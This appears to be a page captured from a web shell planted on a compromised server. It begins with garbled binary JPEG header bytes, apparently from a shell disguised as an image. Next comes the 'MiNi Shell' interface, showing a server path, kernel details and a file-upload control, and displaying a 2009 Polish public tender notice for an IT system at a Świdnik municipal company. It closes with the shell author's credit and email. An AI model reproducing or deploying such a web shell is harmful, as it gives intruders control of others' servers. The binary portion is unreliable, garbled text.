JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/126340-N-2009.html

<p class="kh_header"><b>Świdnik: dostawa, wdrożenie i uruchomienie zintegrowanego systemu informatycznego wspomagającego zarządzanie przedsiębiorstwem wraz ze stałą obsługą informatyczną</b><br>
<b>Numer ogłoszenia: 126340 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne "Pegimek" Sp. z o.o. , ul. Konopnickiej 3, 21-040 Świdnik, woj. lubelskie, tel. 081 7512044, faks 081 7512837.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pegimek.swidnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna, o której mowa w art. 3 ust. 1 pkt 3 ustawy Pzp.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa, wdrożenie i uruchomienie zintegrowanego systemu informatycznego wspomagającego zarządzanie przedsiębiorstwem wraz ze stałą obsługą informatyczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest dostawa, wdrożenie i uruchomienie zintegrowanego systemu informatycznego wspomagającego zarządzanie przedsiębiorstwem w zakresie gospodarki wodno-ściekowej oraz systemu kadrowo-płacowego i finansowo-księgowego. Planuje się, że cały system będzie obejmował współpracujące ze sobą moduły: analizy ekonomiczne i finansowe, controlling, gospodarka licznikami, gospodarka magazynowa, sprzedaż wody i ścieków, zarządzanie infrastrukturą, pracownicy, umowy cywilne, ewidencja czasu pracy, ZUS zgłoszenia, szkolenia, kartoteka pracowników, kartoteka umów cywilnych, listy płac, pity, ZUS rozliczenia, księga główna, rejestracja, VAT, przeksięgowanie, przelewy, kasa-bank, rozrachunki windykacja, majątek trwały, baza klientów, zarządzanie flotą pojazdów.
Przedmiot zamówienia obejmuje również: zakup i instalację sprzętu komputerowego  (zakup serwera, komputerów, PSION-ów i in. w zależności od potrzeb) niezbędnego do sprawnego działania zintegrowanego systemu informatycznego oferowanego przez Wykonawcę, zakup wszystkich niezbędnych licencji całego oprogramowania.
Wykonawca udzieli min. 3 letniej gwarancji na zainstalowane oprogramowanie.
Po wdrożeniu i uruchomieniu systemu Wykonawca będzie prowadził stałą obsługę informatyczną.
Opis potrzeb i wymagań Zamawiającego odnośnie zintegrowanego systemu informatycznego zawiera zał. nr 4 do ogłoszenia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.90.00.00-7, 30.21.30.00-5, 30.21.31.00-6, 30.23.70.00-9, 42.96.51.00-9, 48.41.10.00-2, 48.41.20.00-9, 48.45.00.00-7, 48.61.10.00-4, 48.62.40.00-8, 48.82.10.00-9, 51.61.00.00-1, 72.26.70.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium wynosi 15000,00 zł (piętnaście tysięcy zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
- wykonali w ciągu ostatnich 3 lat  przed dniem wszczęcia postępowania (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 3 zamówienia odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. zamówienia polegające na wdrożeniu i uruchomieniu zintegrowanego systemu informatycznego do zarządzania przedsiębiorstwem z sektora gospodarki komunalnej (np. wod-kan, ciepłownictwo, wywóz odpadów) o wartości min. 250 000,00 zł brutto każde zamówienie;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
		Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach, które składa się wraz z wnioskiem.  Nie spełnienie chociażby jednego z wyżej wymienionych warunków spowoduje wykluczenie wykonawcy z postępowania. 
	Wykonawcy, którzy spełnią wymagane warunki udziału w postępowaniu zostaną zaproszeni do składania ofert. Jeżeli liczba wykonawców, którzy spełniają wymagane warunki będzie większa niż 3 (trzech) do składania ofert zostaną zaproszeni wykonawcy, którzy otrzymają najwyższe oceny spełniania tych warunków. Punkty będą przyznawane za ilość wykonanych zamówień (ocenie będą podlegały zamówienia spełniające warunki określone w warunkach udziału w postępowaniu, potwierdzone dokumentami, że zostały wykonane należycie): za każde zamówienie ponad wymagane 3 zamówienia, Wykonawca otrzyma 1 pkt..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1.	 wniosek o dopuszczenie do udziału w dialogu konkurencyjnym (wniosek powinien zawierać: nazwę i adres Zamawiającego, nr telefonu i faxu oraz wykaz załączonych do wniosku dokumentów i oświadczeń) - wg zał. nr 1;
1.2.	 oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy PZP i nie podlega wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy PZP) - wg zał. nr 2,
1.3.	 aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, [wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert],
1.4.	 aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert];
1.5.	 aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert];
1.6.	 wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - wg zał. nr 3;
- wykonawca musi wykazać, że wykonał co najmniej 3 zamówienia polegające na wdrożeniu i uruchomieniu zintegrowanego systemu informatycznego do zarządzania przedsiębiorstwem z sektora gospodarki komunalnej (np. wod-kan, ciepłownictwo, wywóz odpadów) o wartości min. 250 000,00 zł brutto każde zamówienie;
1.7.	 dokumenty potwierdzające, że usługi wymienione w wykazie zostały wykonane należycie;

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt 1.3, 1.4, 1.5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez upełnomocnionego przedstawiciela Wykonawcy. 

Ponadto wniosek powinien zawierać:
-  pełnomocnictwo - w przypadku podpisywania wniosku, oferty, umowy, składania oświadczeń woli lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez notariusza.
- w przypadku wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowaniu ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
- w przypadku Wykonawców prowadzących działalność w formie spółki cywilnej - umowę spółki cywilnej.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich wniosek musi spełniać następujące wymagania:
o	wniosek musi być podpisany w taki sposób, by prawnie zobowiązywał wszystkich  wykonawców występujących wspólnie, 
o	przy ocenie spełnienia warunków udziału, o których mowa powyżej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące  o spełnieniu warunków będą zsumowane. Nie spełnienie powyższych wymagań spowoduje wykluczenie oferty konsorcjum. 
o	w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z przedsiębiorców wchodzący w skład konsorcjum oddzielnie musi przedstawić dokumenty wymienione w punktach: 1.3, 1.4, 1.5.
o	wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Pełnomocnictwo powinno być przedłożone wraz z wnioskiem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - koszty stałej obsługi informatycznej - 20</li>
<li>3 - funkcjonalność - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> specyfikacja nie będzie udostępniona na stronie internetowej.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> specyfikacja zostanie przekazana wykonawcom wraz z zaproszeniem do składania ofert (zgodnie z art. 60e ust. 3 ustawy Pzp).</p>
<p><b>IV.3.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> opis potrzeb i wymagań zamawiającego znajduje się w załączniku nr 4 do ogłoszenia i jest umieszczony na stronie internetowej www.pegimek.swidnik.pl. Pod podanym adresem znajdują się również wzory załączników (w tym wzór wniosku) do wykorzystania przez Wykonawców..</p><p><b>IV.3.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> zamawiający nie przewiduje nagród dla wykonawców.</p><p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 11:00, miejsce: sekretariat (pok. nr 14) Zamawiającego, ul. Konopnickiej 3, 21-040 Świdnik.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com